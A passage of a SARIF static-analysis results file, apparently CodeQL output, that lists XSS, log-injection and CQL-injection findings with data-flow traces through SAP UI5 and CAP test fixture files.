null"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":602},"region":{"startLine":22,"startColumn":5,"endColumn":38}},"message":{"text":"content={/input}"}}}]}]},{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":602},"region":{"startLine":15,"startColumn":5,"endLine":18,"endColumn":29}},"message":{"text":"value={/input}"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":599},"region":{"startLine":9,"startColumn":17,"endColumn":28}},"message":{"text":"input: null"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":602},"region":{"startLine":22,"startColumn":5,"endColumn":38}},"message":{"text":"content={/input}"}}}]}]}],"relatedLocations":[{"id":1,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":602},"region":{"startLine":8,"startColumn":5,"endLine":10,"endColumn":27}},"message":{"text":"user-provided value"}},{"id":2,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":602},"region":{"startLine":15,"startColumn":5,"endLine":18,"endColumn":29}},"message":{"text":"user-provided value"}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":602},"region":{"startLine":8,"startColumn":5,"endLine":10,"endColumn":27}}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":602},"region":{"startLine":15,"startColumn":5,"endLine":18,"endColumn":29}}}]},{"ruleId":"js/ui5-xss","rule":{"id":"js/ui5-xss","index":5,"toolComponent":{"index":4}},"message":{"text":"XSS vulnerability due to [user-provided value](1)."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-xml-fragment/webapp/view/app.view.html","uriBaseId":"%SRCROOT%","index":612},"region":{"startLine":4,"startColumn":11,"endColumn":34}}}],"partialFingerprints":{"primaryLocationLineHash":"12910cc8c9f5b899:1","primaryLocationStartColumnFingerprint":"0"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-xml-fragment/webapp/view/TestFragment.fragment.xml","uriBaseId":"%SRCROOT%","index":611},"region":{"startLine":5,"endLine":7,"endColumn":29}},"message":{"text":"value={/input}"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-xml-fragment/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":606},"region":{"startLine":9,"startColumn":17,"endColumn":28}},"message":{"text":"input: null"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-xml-fragment/webapp/view/app.view.html","uriBaseId":"%SRCROOT%","index":612},"region":{"startLine":4,"startColumn":11,"endColumn":34}},"message":{"text":"data-content={/input}"}}}]}]}],"relatedLocations":[{"id":1,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-xml-fragment/webapp/view/TestFragment.fragment.xml","uriBaseId":"%SRCROOT%","index":611},"region":{"startLine":5,"endLine":7,"endColumn":29}},"message":{"text":"user-provided value"}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-xml-fragment/webapp/view/TestFragment.fragment.xml","uriBaseId":"%SRCROOT%","index":611},"region":{"startLine":5,"endLine":7,"endColumn":29}}}]},{"ruleId":"js/ui5-xss","rule":{"id":"js/ui5-xss","index":5,"toolComponent":{"index":4}},"message":{"text":"XSS vulnerability due to [user-provided value](1)."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-xml-fragment-load/webapp/view/app.view.html","uriBaseId":"%SRCROOT%","index":621},"region":{"startLine":4,"startColumn":11,"endColumn":34}}}],"partialFingerprints":{"primaryLocationLineHash":"12910cc8c9f5b899:1","primaryLocationStartColumnFingerprint":"0"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-xml-fragment-load/webapp/view/TestFragment.fragment.xml","uriBaseId":"%SRCROOT%","index":620},"region":{"startLine":5,"endLine":7,"endColumn":29}},"message":{"text":"value={/input}"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-xml-fragment-load/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":616},"region":{"startLine":10,"startColumn":17,"endColumn":28}},"message":{"text":"input: null"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-xml-fragment-load/webapp/view/app.view.html","uriBaseId":"%SRCROOT%","index":621},"region":{"startLine":4,"startColumn":11,"endColumn":34}},"message":{"text":"data-content={/input}"}}}]}]}],"relatedLocations":[{"id":1,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-xml-fragment-load/webapp/view/TestFragment.fragment.xml","uriBaseId":"%SRCROOT%","index":620},"region":{"startLine":5,"endLine":7,"endColumn":29}},"message":{"text":"user-provided value"}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-xml-fragment-load/webapp/view/TestFragment.fragment.xml","uriBaseId":"%SRCROOT%","index":620},"region":{"startLine":5,"endLine":7,"endColumn":29}}}]},{"ruleId":"js/ui5-xss","rule":{"id":"js/ui5-xss","index":5,"toolComponent":{"index":4}},"message":{"text":"XSS vulnerability due to [user-provided value](1)."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-json-view/webapp/view/app.view.json","uriBaseId":"%SRCROOT%","index":567},"region":{"startLine":13,"startColumn":15,"endColumn":25}}}],"partialFingerprints":{"primaryLocationLineHash":"91ab068baa94c999:1","primaryLocationStartColumnFingerprint":"11"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-json-view/webapp/view/app.view.json","uriBaseId":"%SRCROOT%","index":567},"region":{"startLine":9,"startColumn":13,"endColumn":23}},"message":{"text":"\"value\": \"{/input}\""}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-json-view/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":563},"region":{"startLine":9,"startColumn":17,"endColumn":28}},"message":{"text":"input: null"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-json-view/webapp/view/app.view.json","uriBaseId":"%SRCROOT%","index":567},"region":{"startLine":13,"startColumn":15,"endColumn":25}},"message":{"text":"\"content\": \"{/input}\""}}}]}]}],"relatedLocations":[{"id":1,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-json-view/webapp/view/app.view.json","uriBaseId":"%SRCROOT%","index":567},"region":{"startLine":9,"startColumn":13,"endColumn":23}},"message":{"text":"user-provided value"}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-json-view/webapp/view/app.view.json","uriBaseId":"%SRCROOT%","index":567},"region":{"startLine":9,"startColumn":13,"endColumn":23}}}]},{"ruleId":"js/cap-log-injection","rule":{"id":"js/cap-log-injection","index":0,"toolComponent":{"index":8}},"message":{"text":"Log entry depends on a [user-provided value](1)."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/srv/service2.js","uriBaseId":"%SRCROOT%","index":217},"region":{"startLine":9,"startColumn":32,"endColumn":45}}}],"partialFingerprints":{"primaryLocationLineHash":"7c291d40b7c61d4f:1","primaryLocationStartColumnFingerprint":"23"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/srv/service2.js","uriBaseId":"%SRCROOT%","index":217},"region":{"startLine":7,"startColumn":35,"endColumn":43}},"message":{"text":"msg.data"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/srv/service2.js","uriBaseId":"%SRCROOT%","index":217},"region":{"startLine":7,"startColumn":15,"endColumn":32}},"message":{"text":"{ messageToPass }"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/srv/service2.js","uriBaseId":"%SRCROOT%","index":217},"region":{"startLine":7,"startColumn":17,"endColumn":30}},"message":{"text":"messageToPass"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/srv/service2.js","uriBaseId":"%SRCROOT%","index":217},"region":{"startLine":9,"startColumn":32,"endColumn":45}},"message":{"text":"messageToPass"}}}]}]}],"relatedLocations":[{"id":1,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/srv/service2.js","uriBaseId":"%SRCROOT%","index":217},"region":{"startLine":7,"startColumn":35,"endColumn":43}},"message":{"text":"user-provided value"}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/srv/service2.js","uriBaseId":"%SRCROOT%","index":217},"region":{"startLine":7,"startColumn":35,"endColumn":43}}}]},{"ruleId":"js/cap-log-injection","rule":{"id":"js/cap-log-injection","index":0,"toolComponent":{"index":8}},"message":{"text":"Log entry depends on a [user-provided value](1)."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service2.js","uriBaseId":"%SRCROOT%","index":224},"region":{"startLine":9,"startColumn":32,"endColumn":45}}}],"partialFingerprints":{"primaryLocationLineHash":"7c291d40b7c61d4f:1","primaryLocationStartColumnFingerprint":"23"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service1.js","uriBaseId":"%SRCROOT%","index":222},"region":{"startLine":7,"startColumn":39,"endColumn":47}},"message":{"text":"req.data"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service1.js","uriBaseId":"%SRCROOT%","index":222},"region":{"startLine":7,"startColumn":19,"endColumn":36}},"message":{"text":"{ messageToPass }"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service1.js","uriBaseId":"%SRCROOT%","index":222},"region":{"startLine":7,"startColumn":21,"endColumn":34}},"message":{"text":"messageToPass"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service1.js","uriBaseId":"%SRCROOT%","index":222},"region":{"startLine":9,"startColumn":38,"endColumn":51}},"message":{"text":"messageToPass"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service1.js","uriBaseId":"%SRCROOT%","index":222},"region":{"startLine":9,"startColumn":36,"endColumn":53}},"message":{"text":"{ messageToPass }"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service2.js","uriBaseId":"%SRCROOT%","index":224},"region":{"startLine":6,"startColumn":29,"endColumn":32}},"message":{"text":"msg"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service2.js","uriBaseId":"%SRCROOT%","index":224},"region":{"startLine":7,"startColumn":35,"endColumn":38}},"message":{"text":"msg"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service2.js","uriBaseId":"%SRCROOT%","index":224},"region":{"startLine":7,"startColumn":15,"endColumn":32}},"message":{"text":"{ messageToPass }"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service2.js","uriBaseId":"%SRCROOT%","index":224},"region":{"startLine":7,"startColumn":17,"endColumn":30}},"message":{"text":"messageToPass"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service2.js","uriBaseId":"%SRCROOT%","index":224},"region":{"startLine":9,"startColumn":32,"endColumn":45}},"message":{"text":"messageToPass"}}}]}]}],"relatedLocations":[{"id":1,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service1.js","uriBaseId":"%SRCROOT%","index":222},"region":{"startLine":7,"startColumn":39,"endColumn":47}},"message":{"text":"user-provided value"}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service1.js","uriBaseId":"%SRCROOT%","index":222},"region":{"startLine":7,"startColumn":39,"endColumn":47}}}]},{"ruleId":"js/cap-log-injection","rule":{"id":"js/cap-log-injection","index":0,"toolComponent":{"index":8}},"message":{"text":"Log entry depends on a [user-provided value](1).\nLog entry depends on a [user-provided value](2)."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service2.js","uriBaseId":"%SRCROOT%","index":232},"region":{"startLine":9,"startColumn":32,"endColumn":45}}}],"partialFingerprints":{"primaryLocationLineHash":"7c291d40b7c61d4f:1","primaryLocationStartColumnFingerprint":"23"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service1.js","uriBaseId":"%SRCROOT%","index":230},"region":{"startLine":7,"startColumn":39,"endColumn":47}},"message":{"text":"req.data"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service1.js","uriBaseId":"%SRCROOT%","index":230},"region":{"startLine":7,"startColumn":19,"endColumn":36}},"message":{"text":"{ messageToPass }"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service1.js","uriBaseId":"%SRCROOT%","index":230},"region":{"startLine":7,"startColumn":21,"endColumn":34}},"message":{"text":"messageToPass"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service1.js","uriBaseId":"%SRCROOT%","index":230},"region":{"startLine":9,"startColumn":38,"endColumn":51}},"message":{"text":"messageToPass"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service1.js","uriBaseId":"%SRCROOT%","index":230},"region":{"startLine":9,"startColumn":36,"endColumn":53}},"message":{"text":"{ messageToPass }"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service2.js","uriBaseId":"%SRCROOT%","index":232},"region":{"startLine":6,"startColumn":29,"endColumn":32}},"message":{"text":"msg"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service2.js","uriBaseId":"%SRCROOT%","index":232},"region":{"startLine":7,"startColumn":35,"endColumn":38}},"message":{"text":"msg"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service2.js","uriBaseId":"%SRCROOT%","index":232},"region":{"startLine":7,"startColumn":15,"endColumn":32}},"message":{"text":"{ messageToPass }"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service2.js","uriBaseId":"%SRCROOT%","index":232},"region":{"startLine":7,"startColumn":17,"endColumn":30}},"message":{"text":"messageToPass"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service2.js","uriBaseId":"%SRCROOT%","index":232},"region":{"startLine":9,"startColumn":32,"endColumn":45}},"message":{"text":"messageToPass"}}}]}]},{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service2.js","uriBaseId":"%SRCROOT%","index":232},"region":{"startLine":7,"startColumn":35,"endColumn":43}},"message":{"text":"msg.data"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service2.js","uriBaseId":"%SRCROOT%","index":232},"region":{"startLine":7,"startColumn":15,"endColumn":32}},"message":{"text":"{ messageToPass }"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service2.js","uriBaseId":"%SRCROOT%","index":232},"region":{"startLine":7,"startColumn":17,"endColumn":30}},"message":{"text":"messageToPass"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service2.js","uriBaseId":"%SRCROOT%","index":232},"region":{"startLine":9,"startColumn":32,"endColumn":45}},"message":{"text":"messageToPass"}}}]}]}],"relatedLocations":[{"id":1,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service1.js","uriBaseId":"%SRCROOT%","index":230},"region":{"startLine":7,"startColumn":39,"endColumn":47}},"message":{"text":"user-provided value"}},{"id":2,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service2.js","uriBaseId":"%SRCROOT%","index":232},"region":{"startLine":7,"startColumn":35,"endColumn":43}},"message":{"text":"user-provided value"}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service1.js","uriBaseId":"%SRCROOT%","index":230},"region":{"startLine":7,"startColumn":39,"endColumn":47}}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service2.js","uriBaseId":"%SRCROOT%","index":232},"region":{"startLine":7,"startColumn":35,"endColumn":43}}}]},{"ruleId":"js/cap-sql-injection","rule":{"id":"js/cap-sql-injection","index":1,"toolComponent":{"index":8}},"message":{"text":"This CQL query contains a string concatenation with a [user-provided value](1)."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":15,"startColumn":15,"endColumn":20}}}],"partialFingerprints":{"primaryLocationLineHash":"77d560033d30e171:1","primaryLocationStartColumnFingerprint":"8"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":13,"startColumn":22,"endColumn":30}},"message":{"text":"req.data"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":13,"startColumn":13,"endColumn":19}},"message":{"text":"{ id }"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":13,"startColumn":15,"endColumn":17}},"message":{"text":"id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":14,"startColumn":56,"endColumn":58}},"message":{"text":"id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":14,"startColumn":48,"endColumn":58}},"message":{"text":"\"ID=\" + id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":14,"startColumn":21,"endColumn":59}},"message":{"text":"SELECT. ... \" + id)"}},"taxa":[{"id":"Config","properties":{"CodeQL/DataflowRole":"step"}}]},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":14,"startColumn":13,"endColumn":18}},"message":{"text":"query"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":15,"startColumn":15,"endColumn":20}},"message":{"text":"query"}}}]}]}],"relatedLocations":[{"id":1,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":13,"startColumn":22,"endColumn":30}},"message":{"text":"user-provided value"}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":13,"startColumn":22,"endColumn":30}}}]},{"ruleId":"js/cap-sql-injection","rule":{"id":"js/cap-sql-injection","index":1,"toolComponent":{"index":8}},"message":{"text":"This CQL query contains a string concatenation with a [user-provided value](1)."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":21,"startColumn":15,"endColumn":20}}}],"partialFingerprints":{"primaryLocationLineHash":"8ebfcdb6d8e3226a:1","primaryLocationStartColumnFingerprint":"8"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":19,"startColumn":22,"endColumn":30}},"message":{"text":"req.data"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":19,"startColumn":13,"endColumn":19}},"message":{"text":"{ id }"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":19,"startColumn":15,"endColumn":17}},"message":{"text":"id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":20,"startColumn":56,"endColumn":58}},"message":{"text":"id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":20,"startColumn":48,"endColumn":58}},"message":{"text":"`ID=` + id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":20,"startColumn":21,"endColumn":59}},"message":{"text":"SELECT. ... ` + id)"}},"taxa":[{"id":"Config","properties":{"CodeQL/DataflowRole":"step"}}]},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":20,"startColumn":13,"endColumn":18}},"message":{"text":"query"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":21,"startColumn":15,"endColumn":20}},"message":{"text":"query"}}}]}]}],"relatedLocations":[{"id":1,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":19,"startColumn":22,"endColumn":30}},"message":{"text":"user-provided value"}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":19,"startColumn":22,"endColumn":30}}}]},{"ruleId":"js/cap-sql-injection","rule":{"id":"js/cap-sql-injection","index":1,"toolComponent":{"index":8}},"message":{"text":"This CQL query contains a string concatenation with a [user-provided value](1)."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":27,"startColumn":15,"endColumn":20}}}],"partialFingerprints":{"primaryLocationLineHash":"d00fe3143fd387fc:1","primaryLocationStartColumnFingerprint":"8"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":25,"startColumn":22,"endColumn":30}},"message":{"text":"req.data"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":25,"startColumn":13,"endColumn":19}},"message":{"text":"{ id }"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":25,"startColumn":15,"endColumn":17}},"message":{"text":"id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":26,"startColumn":54,"endColumn":56}},"message":{"text":"id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":26,"startColumn":48,"endColumn":58}},"message":{"text":"`ID=${id}`"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":26,"startColumn":21,"endColumn":59}},"message":{"text":"SELECT. ... ${id}`)"}},"taxa":[{"id":"Config","properties":{"CodeQL/DataflowRole":"step"}}]},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":26,"startColumn":13,"endColumn":18}},"message":{"text":"query"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":27,"startColumn":15,"endColumn":20}},"message":{"text":"query"}}}]}]}],"relatedLocations":[{"id":1,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":25,"startColumn":22,"endColumn":30}},"message":{"text":"user-provided value"}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":25,"startColumn":22,"endColumn":30}}}]},{"ruleId":"js/cap-sql-injection","rule":{"id":"js/cap-sql-injection","index":1,"toolComponent":{"index":8}},"message":{"text":"This CQL query contains a string concatenation with a [user-provided 